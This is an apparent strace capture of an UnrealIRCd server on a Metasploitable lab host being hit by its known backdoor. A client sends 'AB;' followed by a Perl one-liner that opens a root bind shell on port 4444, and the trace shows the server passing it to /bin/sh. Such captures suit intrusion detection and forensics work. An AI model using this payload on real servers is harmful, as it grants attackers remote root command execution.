4519  07:31:50.683269 select(1024, [2 3 4 7 9], [], NULL, {0, 810000}) = 1 (in [2], left {0, 620000})

4519  07:31:50.869756 clock_gettime(CLOCK_MONOTONIC, {2320, 686777629}) = 0

4519  07:31:50.869778 accept(2, 0, NULL) = 5

4519  07:31:50.869798 getpeername(5, {sa_family=AF_INET, sin_port=htons(42229), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:31:50.869829 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:50.869841 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:50.869854 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:31:50.869866 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:31:50.869877 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:31:50.869888 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:31:50.869902 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:31:50.869918 clock_gettime(CLOCK_MONOTONIC, {2320, 686931891}) = 0

4519  07:31:50.869930 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:31:50.869942 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:31:50.869951 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:31:50.869960 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:31:50.869970 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:31:50.869986 send(6, "bO\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:31:50.870078 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:31:50.870132 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:31:50.870220 gettimeofday({1495625510, 870226}, NULL) = 0

4519  07:31:50.870235 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:31:50.874211 clock_gettime(CLOCK_MONOTONIC, {2320, 691229605}) = 0

4519  07:31:50.874245 recvfrom(6, "bO\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0;\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:31:50.874286 close(6)          = 0

4519  07:31:50.874318 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:31:50.874378 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:31:50.874431 time(NULL)        = 1495625510

4519  07:31:50.874444 time(NULL)        = 1495625510

4519  07:31:50.874457 gettimeofday({1495625510, 874461}, NULL) = 0

4519  07:31:50.874469 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:31:50.874511 clock_gettime(CLOCK_MONOTONIC, {2320, 691524404}) = 0

4519  07:31:50.874522 gettimeofday({1495625510, 874525}, NULL) = 0

4519  07:31:50.874532 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:31:50.874571 clock_gettime(CLOCK_MONOTONIC, {2320, 691583452}) = 0

4519  07:31:50.874582 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:31:50.874610 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:31:50.874629 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:31:50.874641 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:31:50.874656 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10193

10193 07:31:50.874730 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10193 07:31:50.874745 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10193 07:31:50.874755 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10193 07:31:50.874768 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10193 07:31:50.874946 brk(0)            = 0x80f9000

10193 07:31:50.874968 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.874983 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc5000

10193 07:31:50.874999 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.875017 open("/etc/ld.so.cache", O_RDONLY) = 1

10193 07:31:50.875029 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10193 07:31:50.875047 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbd000

10193 07:31:50.875071 close(1)          = 0

10193 07:31:50.875082 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.875097 open("/lib/libncurses.so.5", O_RDONLY) = 1

10193 07:31:50.875110 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10193 07:31:50.875206 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10193 07:31:50.875224 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f8d000

10193 07:31:50.875236 mmap2(0xb7fba000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7fba000

10193 07:31:50.875253 close(1)          = 0

10193 07:31:50.875265 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.875279 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10193 07:31:50.875307 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10193 07:31:50.875446 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10193 07:31:50.875476 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f89000

10193 07:31:50.875488 mmap2(0xb7f8b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f8b000

10193 07:31:50.875504 close(1)          = 0

10193 07:31:50.875519 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.875533 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10193 07:31:50.875547 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10193 07:31:50.875636 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10193 07:31:50.875653 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f88000

10193 07:31:50.875667 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e39000

10193 07:31:50.875678 mmap2(0xb7f82000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f82000

10193 07:31:50.875693 mmap2(0xb7f85000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f85000

10193 07:31:50.875706 close(1)          = 0

10193 07:31:50.875729 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e38000

10193 07:31:50.875740 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e386b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10193 07:31:50.875812 mprotect(0xb7f82000, 4096, PROT_READ) = 0

10193 07:31:50.875851 munmap(0xb7fbd000, 29913) = 0

10193 07:31:50.875876 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10193 07:31:50.875890 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10193 07:31:50.875910 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9192d0) = -1 ENOTTY (Inappropriate ioctl for device)

10193 07:31:50.875941 brk(0)            = 0x80f9000

10193 07:31:50.875950 brk(0x80fa000)    = 0x80fa000

10193 07:31:50.875962 brk(0x80fb000)    = 0x80fb000

10193 07:31:50.875978 getuid32()        = 0

10193 07:31:50.875988 getgid32()        = 0

10193 07:31:50.875997 geteuid32()       = 0

10193 07:31:50.876006 getegid32()       = 0

10193 07:31:50.876020 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10193 07:31:50.876034 time(NULL)        = 1495625510

10193 07:31:50.876046 brk(0x80fc000)    = 0x80fc000

10193 07:31:50.876061 brk(0x80fd000)    = 0x80fd000

10193 07:31:50.876080 open("/proc/meminfo", O_RDONLY) = 1

10193 07:31:50.876102 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10193 07:31:50.876120 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc4000

10193 07:31:50.876131 read(1, "MemTotal:      1035240 kB\nMemFree:        427048 kB\nBuffers:         76100 kB\nCached:         372876 kB\nSwapCached:          0 kB\nActive:         256252 kB\nInactive:       321656 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        426808 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4344 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          51956 kB\nSlab:            19008 kB\nSReclaimable:    10444 kB\nSUnreclaim:       8564 kB\nPageTables:       1988 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10193 07:31:50.876220 close(1)          = 0

10193 07:31:50.876232 munmap(0xb7fc4000, 4096) = 0

10193 07:31:50.876243 brk(0x80fe000)    = 0x80fe000

10193 07:31:50.876270 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10193 07:31:50.876294 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10193 07:31:50.876309 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10193 07:31:50.876321 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10193 07:31:50.876333 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10193 07:31:50.876346 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10193 07:31:50.876359 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10193 07:31:50.876371 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10193 07:31:50.876384 uname({sys="Linux", node="metasploitable", ...}) = 0

10193 07:31:50.876433 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10193 07:31:50.876451 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10193 07:31:50.876469 brk(0x8100000)    = 0x8100000

10193 07:31:50.876481 getcwd("/etc/unreal", 4096) = 12

10193 07:31:50.876496 getpid()          = 10193

10193 07:31:50.876512 getppid()         = 4519

10193 07:31:50.876527 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10193 07:31:50.876547 stat64("/sbin/sh", 0xbf9192a8) = -1 ENOENT (No such file or directory)

10193 07:31:50.876559 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10193 07:31:50.876577 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10193 07:31:50.876602 socket(PF_FILE, SOCK_STREAM, 0) = 1

10193 07:31:50.876615 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10193 07:31:50.876628 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10193 07:31:50.876649 close(1)          = 0

10193 07:31:50.876660 socket(PF_FILE, SOCK_STREAM, 0) = 1

10193 07:31:50.876670 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10193 07:31:50.876681 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10193 07:31:50.876699 close(1)          = 0

10193 07:31:50.876712 open("/etc/nsswitch.conf", O_RDONLY) = 1

10193 07:31:50.876726 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10193 07:31:50.876743 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc4000

10193 07:31:50.876754 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10193 07:31:50.876897 read(1, "", 4096) = 0

10193 07:31:50.876908 close(1)          = 0

10193 07:31:50.876918 munmap(0xb7fc4000, 4096) = 0

10193 07:31:50.876934 open("/etc/ld.so.cache", O_RDONLY) = 1

10193 07:31:50.876946 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10193 07:31:50.876963 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbd000

10193 07:31:50.876973 close(1)          = 0

10193 07:31:50.876984 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.876999 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10193 07:31:50.877013 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10193 07:31:50.877106 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10193 07:31:50.877124 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e2f000

10193 07:31:50.877136 mmap2(0xb7e36000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e36000

10193 07:31:50.877153 close(1)          = 0

10193 07:31:50.877165 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.877178 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10193 07:31:50.877192 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10193 07:31:50.877280 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10193 07:31:50.877297 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e17000

10193 07:31:50.877308 mmap2(0xb7e2b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e2b000

10193 07:31:50.877323 mmap2(0xb7e2d000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e2d000

10193 07:31:50.877337 close(1)          = 0

10193 07:31:50.877374 munmap(0xb7fbd000, 29913) = 0

10193 07:31:50.877393 open("/etc/ld.so.cache", O_RDONLY) = 1

10193 07:31:50.877406 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10193 07:31:50.877423 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbd000

10193 07:31:50.877433 close(1)          = 0

10193 07:31:50.877443 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10193 07:31:50.877458 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10193 07:31:50.877472 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10193 07:31:50.877565 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10193 07:31:50.877583 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0d000

10193 07:31:50.877594 mmap2(0xb7e15000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e15000

10193 07:31:50.877611 close(1)          = 0

10193 07:31:50.877623 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

